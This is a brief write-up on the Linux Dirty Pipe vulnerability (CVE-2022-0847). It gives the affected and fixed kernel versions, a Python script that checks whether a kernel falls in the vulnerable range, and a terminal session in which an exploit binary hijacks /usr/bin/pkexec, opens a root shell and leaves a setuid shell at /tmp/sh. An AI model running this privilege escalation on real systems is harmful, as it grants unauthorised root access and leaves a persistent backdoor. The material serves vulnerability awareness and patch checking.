This is the story of CVE-2022-0847, a vulnerability present in the Linux kernel since 5.8 that allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.
It is similar to CVE-2016-5195 “Dirty Cow” but is easier to exploit.
The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.
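As an added check that is not part of the original writeup, the script below compares the running kernel's upstream version number against the fixed releases listed above (5.16.11, 5.15.25, 5.10.102) and treats 5.8 up to those points as affected. It assumes a `uname -r` style release string; distribution kernels backport fixes without changing that number, so a positive result is only a prompt to consult the vendor advisory.

```python
import re
import platform

# Stable releases carrying the fix for CVE-2022-0847, as listed in the text.
FIXED_IN = {(5, 10): 102, (5, 15): 25, (5, 16): 11}
FIRST_AFFECTED = (5, 8)          # bug introduced in 5.8
FIRST_FIXED_MAINLINE = (5, 17)   # fix merged upstream before 5.17 was released


def parse_release(release):
    """Extract (major, minor, patch) from a release string such as
    '5.15.24-arch1' or '5.10.102'. A missing patch level counts as 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def upstream_affected(release):
    """True when the upstream version number falls in the vulnerable range.
    Distribution kernels (assumption: vendor backports) keep an older number
    after patching, so confirm a True result against the vendor advisory."""
    major, minor, patch = parse_release(release)
    branch = (major, minor)
    if branch < FIRST_AFFECTED or branch >= FIRST_FIXED_MAINLINE:
        return False
    fixed_patch = FIXED_IN.get(branch)
    if fixed_patch is None:
        # 5.8, 5.9 and 5.11 to 5.14: no fixed stable release is listed above,
        # so every version on these branches is treated as affected.
        return True
    return patch < fixed_patch


if __name__ == "__main__":
    rel = platform.release()
    state = "inside" if upstream_affected(rel) else "outside"
    print(f"kernel {rel}: {state} the CVE-2022-0847 vulnerable range "
          "(verify against your distribution's advisory)")
```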
$ gcc dirtypipez.c -o dirtypipez
$ file dirtypipez
dirtypipez: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f7aee8d04713d6c27bc73e3f5fb59b1eee5feeaf, for GNU/Linux 3.2.0, not stripped

$ id
uid=1000(crypt0rr) gid=1000(crypt0rr) groups=1000(crypt0rr)
$ ./dirtypipez /usr/bin/pkexec
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# whoami
root
#
The setuid root shell dropped by the exploit is left at /tmp/sh. Remember to remove it after using or re-using it.

$ ls -l /tmp/sh
-rwsr-xr-x 1 root crypt0rr 186 Mar 8 10:19 /tmp/sh